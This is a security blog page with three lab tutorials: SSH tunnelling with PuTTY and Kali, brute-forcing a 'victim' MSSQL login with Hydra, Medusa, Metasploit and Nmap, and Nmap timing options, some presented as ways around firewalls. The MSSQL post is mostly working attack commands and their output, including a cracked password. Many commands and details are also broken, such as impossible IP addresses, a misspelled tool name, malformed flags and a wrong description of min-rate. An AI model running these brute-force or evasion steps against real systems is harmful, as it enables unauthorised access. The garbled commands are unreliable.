Comprehensive Guide to SSH Tunnelling

at 12:03 AM Friday, March 16, 2018 0 comments

Basically tunneling is process which allows data sharing or communication between two different networks privately. Tunneling is normally perform through encapsulating the private network data and protocol information inside the public network broadcast units so that the private network protocol information visible to the public network as data. 
SSH Tunnel:  Tunneling is the concept to encapsulate the network protocol to another protocol here we put into SSH, so all network communication are encrypted. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, a third use is to hide the nature of the traffic that is run through the tunnels.
Types of SSH Tunneling:     
1.      Dynamic SSH tunneling
2.      Local SSH tunneling
3.      Remote SSH tunneling
Let’s Begin!!
Objective:  To establish SSH connection between remote PC and local system of different network.
Here I have set my own lab which consist three systems in following network:
SSH server (two Ethernet interface) 
IP 192.168.1.104 connected with remote system
IP 192.168.10.1 connected to local network system 192.168.10.2
SSH client (local network) holds IP 192.168.10.2
Remote system (outside network)
In following image we are trying to explain SSH tunneling process where a remote PC is trying to connect to 192.168.10.2 which is on INTRANET of another network. To establish connection with SSH client (raj), remote PC will create SSH tunnel which will connect with the local system via SSH server (Ignite).
NOTE: Service SSH must be activated on server as well as client machine.


Given below image is describing the network configuration for SSH server where it is showing two IP 192.168.1.104 and another 192.168.10.1



Another image given below is describing network configuration for SSH client which is showing IP 192.168.10.2


Dynamic SSH Tunneling through Windows

Remote Pc is trying to connect to SSH server (192.168.1.104) via port 22 and get successful login inside server. Here we had used putty for establishing connection between SSH server (Ubuntu) and remote user (Windows).



Similarly now Remote PC trying to connect with Client PC (192.168.10.2) via port 22, since they belongs to different network therefore he receive network error.


Step for Dynamic SSH tunneling
  • Choose option SSH >Tunnel given in the left column of category.
  • Give new port forwarded as 7000 and connection type as dynamic and click on ADD at last.


Now connect to SSH server 192.168.1.104 via port 22 and then click on open when all things get set.


First it will connect to SSH server as you can see we are connected with SSH server (Ignite).


Now login into putty again and give IP of client system as Host Name 192.168.10.2 and Port 22 for SSH then click on open.



Open previous running window of putty choose Proxy option from category and follow given below step:
  • Select proxy type as SOCKS 5
  • Give proxy hostname as 127.0.0.1 and port 7000
  • Click on open to establish connection.


Awesome!! We have successfully access SSH client (raj) via port 7000


Dynamic SSH Tunneling through Kali Linux
Now we are employing Kali Linux for SSH tunneling and demonstrating how an attacker or Linux user can take privilege of Tunneling and can established SSH connection with client systems.

ssh -D 7000 ignite@192.168.1.104
Enter user’s password for login and get access of SSH server as shown below.


Next we need to set network proxy for enabling socksv5 and for that follow below steps.

·         In your web browser “Firefox” go to option for general setting tab and open Network Proxy.
·         Choose Manual Proxy option.
·         Enable socksv5 option.
·         Add localhost, 127.0.0.1 as No proxy


So from given below image you can perceive that now we able to connect with client: 192.168.10.2 via port 80.


Now connect to client machine through given below command:

ssh -D 7000 ignite@192.168.1.104


Install tsocks through apt repository using command: apt install tsocks.

tsocks - Library for intercepting outgoing network connections and redirecting them through a SOCKS server. 


Open the tsocks.conf file for editing socks server IP and port, in our case we need to mention below two lines and then save it.
Server = 127.0.0.1
Server_port = 7000


Now connect to SSH client with the help tsocks using given below command.
tscoks ssh raj@192.168.1.10.2
Enter the password and enjoy the access of SSH client.


Local SSH Tunneling through Windows
Local tunneling is a process to access a specific SSH client machine for communication. It let you establish the connection on a specific machine which is not connected from internet.
The only difference between dynamic tunneling and local tunneling is that, dynamic tunneling requires socks proxy for tunneling all TCP traffic and local tunneling only required destination IP address.

Step for SSH Local tunneling
·         Use putty to connect SSH server (192.168.1.104) via port 22 and choose option SSH >Tunnel given in the left column of category.


·         Give new port forwarded as 7000 and connection type as local 
·         Destination address as 198.168.10.2:22 for establishing connection with specific client and click on ADD at last.
·         Click on open when all things get set.


First this will establish connection between remote pc and SSH server.


Open new window of putty and follow given below step:
·         Give hostname as localhost and port 7000 and connection type SSH.
·         Click on open to establish connection.


Awesome!! We have successfully access SSH client via port 7000 


Local SSH Tunneling through Kali Linux

Now again we switch into Kali Linux for local tunneling which is quite easy as compare to dynamic. Execute given below command for forwarding port to local machine.
ssh -L 7000:192.168.1.10.2:22 ignite@192.168.1.104  


Now open a new terminal and type below command for connecting to SSH client.
ssh raj@127.0.0.1 -p 7000
Awesome!! We have successfully access SSH client via port 7000 


Remote SSH Tunneling through Putty

Remote tunneling is functional when a client machine wants to access a remote system which is outward from its network.
First need to install putty in our SSH server (ignite) and then follow given steps.

Step for remote tunneling
·         Enter remote system IP 192.168.1.108
·         Mention port 22
·         Go to SSH>tunnel options



Give new port forwarded as 7000 and connection type as Remote
·         Destination address as 198.168.10.2:22 for establishing connection with specific client and click on ADD at last.
·         Click on open when all things get set.


Now server will get connected to Remote system as shown in below image.


Come back to remote system and enter following command to with SSH client machine.
ssh raj@127.0.0.1 -p 7000
From given below image you can observed that we had successfully connected with SSH client machine via port 7000.


Remote SSH Tunneling through Command-Line
If you are not willing to use putty for remote tunneling then you can execute following command
ssh -R 7000:192.168.1.10.2 root@192.168.1.108
Here 192.168.1.10.2 is our local client (raj) IP and 192.168.1.108 is our remote system IP.


Come back to remote system and enter following command to with SSH client machine.
ssh raj@127.0.0.1 -p 7000
From given below image you can observed that we had successfully connected with SSH client machine via port 7000.























Labels:

4 ways to Hack MS SQL Login Password

at 11:28 PM Thursday, March 15, 2018 0 comments
 In this article, we will learn how to gain control over our victim’s PC through 1433 Port use for MSSQL service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.
 Let’s starts!!
Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more
Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.
Run the following command
 Hydra -L/root/Desktop/user.txt 1433 –P /root/Desktop/pass.txt 16 192.168.1.128 mssql
-P:  denotes path for password list
-L: denotes path of username text file (sa is default user of Mssql)

Once the commands are executed it will start applying the dictionary attack and so you will have the right password in no time. As you can observe that we had successfully grabbed the MSSQL password as apple@123456

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, MSSQL, HTTP, IMAP, rlogin, SSH, Subversion, and MSSQL to name a few
Run the following command
Medusa -h 192.168.1.128 –u /root/Desktop/user.txt –P /root/Desktop/pass.txt –M Mssql
Here
-u: denotes username (sa is default user of Mssql)
-P:  denotes path for password list
As you can observe that we had successfully grabbed the MSSQL password as apple@123456.

xHydra 
This is the graphical version to apply dictionary attack via 1433 port to hack a system. For this method to work:
Enter xHydra in your kali Linux terminal. And select Single Target option and their give the IP of your victim PC. And select MSSQL in box against Protocol option and give the port number 1433 against the port option.


Now, go to Passwords tab and select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.


After doing this, go to Start tab and click on Start button on the left.
Now, the process of dictionary attack will start. Thus, you will attain the username:sa and password of your victim.


Metasploit


This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).
use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.128
msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/user.txt
msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true
msf auxiliary(scanner/mssql/mssql_login) > run
Awesome!! From given below image you can observe the same password: apple@123456 have been found by metasploit.

NMAP

Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.
nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.128
In specfied image you can observe that we had successfully retrieve credential for usersUsername: sa and password: apple@123456












Labels:

Nmap Scan with Timing Parameters

at 2:42 AM 0 comments

Hello everyone, in this article we will have a look at the different parameters that are used together to make a timing template and how to use those parameters individually according to will.
Let’s Start!!
Nmap timing template
As we have seen that Nmap has multiple timing templates that can be used for differently as according to the requirement. Click here to check the timing scan article. Let’s see what’s inside the timing template. For getting the description of timing template we’ll use -dattribute.
nmap –T4 –d -p21-25 192.168.1.139
Here we have multiple arguments that collectively make a timing template. Let’s have a look at them one by one.
·         Host-groups
·         Rtt-timeouts
·         Scan-delay
·         Max-retires
·         Min-rates
·         Parallelism



Maximum Retries (--max-retries)
--max-retries specifies the number of times a packet is to be resent on a port to check if it is open or closed. If --max-retries is set to 0, the packets will be sent only once on a port and no retries will be done.
nmap -p21-25 192.168..1.139 --max-retries 0


Here in wireshark, we can see that 1-1 TCP SYN packet sent to each port from source: 192.168.1.126 to destination: 192.168.1.139 are not sent again.


Now we will apply a small firewall rule on the target machine so that the packets get blocked if they come at a faster rate.
sudo iptables -I INPUT -p tcp -m state --state NEW --m recent --set
sudo iptables -I INPUT -p tcp -m state --state NEW --m recent --update --seconds 1 --hitcount 1 -j DROP


Now, the normal scan will not show any results with max-retries

nmap -p21-25 192.168..1.139 --max-retries 0


As we can see that the ports whose packets got dropped are not sent again so their status is not determined.


here we can increase the max-retries value which will bypass the specified firewall filter so that we can get the exact port status.
nmap -p21-25 192.168..1.139 --max-retries 5


Here we can see that TCP SYN packets sent to one port from source: 192.168.1.126 to destination: 192.168.1.139 are sent again and again until the packets return a specified reply or the maximum retry value (here 5) is reached.


Host-timeout
The --host-timeout is an attribute that specifies the scan to give up on a host after the specified time. The lesser the time specified the more are the chances of inaccuracy in scan results.
We can specify time in milliseconds (ms), seconds (s), minutes (m)
nmap -p21-25 192.168.1.139 --host-timeout 10ms


Now we will try to get the result by increasing the timeout value
nmap-p21-25 192.168.1.139--host-timeout 100ms


We can use --host-timeout in other scenarios also like when we need to check if the host system is live or not. Here we have shown how the host-timeout can affect the results of a ping scan.
nmap -sp 192.168.1.139 --host-timeout 10ms
Output from above command had given 0 host is up.
nmap -sp 192.168.1.139--host-timeout 100ms
Output from above command had given 1 host is up.


Hostgroup

hostgroup attribute is specified to scan a specified number of hosts in network at a time. You need to specify minimum number of hosts or maximum number of hosts or both to be scaned at a time
nmap --sP 192.168.1.1/24 --min-hostgroup 3 --max-hostgroup 3
From given below image you can observed that it has shown only 3 live host from inside complete subnet mask and save your time from scanning complete network.


Scan delay
Scan delay is used to delay the packet to be sent by the specified time. It is very useful in evading time based firewalls.
nmap –p21-25 192.168.1.139 –scan-delay 11s


here we can see the time difference in between the packets

packet 1: TCP SYN packet on port 25 at 07:58:01 from 192.168.1.126 to 192.168.1.139


packet 2: TCP SYN packet on port 22 at 07:58:12 from 192.168.1.126 to 192.168.1.139
Now if you will count the time difference between these packets you get 11 sec time laps between these two packets.


Maximum rate (max-rate)

Rate is an attribute that specifies at what rate is the packets are to be sent, in other words number of packets to be sent at a time. Max-rate specifies maximum number of packets to be sent at once.

nmap -p21-25 192.168.1.139 --max-rate 2


wireshark shows that the packets sending rate is less than 2, means number of packets sent at a time is less than or equal to 2
packet 1: TCP SYN packet on port 21 at 03:17:20 from 192.168.1.126 to 192.168.1.139


packet 2: TCP SYN packet on port 23 at 03:17:21 from 192.168.1.126 to 192.168.1.139
Now if you will count the time difference between these packets you get 1 sec time laps between these two packets indicating that these two packets were not sent together.


Minimum rate (mini-rate)

Min-rate specifies maximum number of packets to be sent at once. Here if we want atleat 2 packet must be sent on target’s network at same time not less then this, then need to execute below command.
nmap -p21-25 192.168.1.139 --min-rate 2


wireshark shows that the packets sending rate is greater than 2, means number of packets sent at a time is equal to or greater than 2

packet 1: TCP SYN packet on port 23 at 03:28:29 from 192.168.1.126 to 192.168.1.139


packet 2: TCP SYN packet on port 22 at 03:28:29 from 192.168.1.126 to 192.168.1.139
Now if you will count the time difference between these packets you get only a fraction of second as time laps between these two packets indicating that these two packets were sent together.


Parallelism
Parallelism attribute is used to send multiple packets in parallel, min-parallelism means that the number of packets to be sent in parallel is to be greater than the value specified and max-parallelism means that the number of packets to be sent in parallel is to be less than or equal to the value specified
nmap -p21-25 192.168.1.139 --min-parallelism 2 --max-parallelism 2


In wireshark we can see the couple of TCP-SYN packetssent in parallel from 192.168.1.126 which is neither less nor greater than 2.


Round trip timeout
Rtt timeout is the time specified for a packet to return a reply, min-rtt-timeout specifies the minimum value of time that is to be taken by a packet to return a reply
nmap -p21-25 192.168.1.139--min-rtt-timeout 5ms


wireshark shows that the packet and its reply takes time greater than the min-rtt-timeout specified
packet 1: TCP SYN packet on port 25 at 08:10:53.232666116 from 192.168.1.126 to 192.168.1.139wireshark shows that the packet and its reply takes time greater than the min-rtt-timeout specified
packet 1: TCP SYN packet on port 25 at 08:10:53.232666116 from 192.168.1.126 to 192.168.1.139


packet 2: SYN ACK packet from port 25 at 08:10:53.233466679 from 192.168.1.139 to 192.168.1.126


Max-rtt-timeout
max-rtt-timeout specifies the maximum value of time that is to be taken by a packet to return a reply
nmap -p21-25 192.168.1.139--max-rtt-timeout 50ms


wireshark shows that the packet and its reply takes time lesser than the max-rtt-timeout

packet 1: TCP SYN packet on port 22 at 08:15:08.171777907 from 192.168.1.126 to 192.168.1.139


packet 2: SYN ACK packet from port 22 at 08:15:08.173117154 from 192.168.1.139 to 192.168.1.126


Intial Round trip timeout

Initial-rtt-timeout specifies the initial value of time to be taken by a packet to return a reply, the return time can be greater or lesser than the  initial-rtt-timeout because of the max-rtt-timeout and min-rtt-timeout specifeies the range of time for a packet to return a reply but the packet attempts to return a reply in the time specified in initial-rtt-timeout
nmap -p21-25 192.168.1.139--initial-rtt-timeout 15ms


wireshark shows that the time taken by packet to return reply is around same as specified in initial-rtt-timeout

packet 1: TCP SYN packet on port 23 at 08:18:45.342395520 from 192.168.1.126 to 192.168.1.139


packet 2: SYN ACK packet from port 23 at 08:18:45.342930962 from 192.168.1.139 to 192.168.1.126






















Labels:
Subscribe to: Posts (Atom)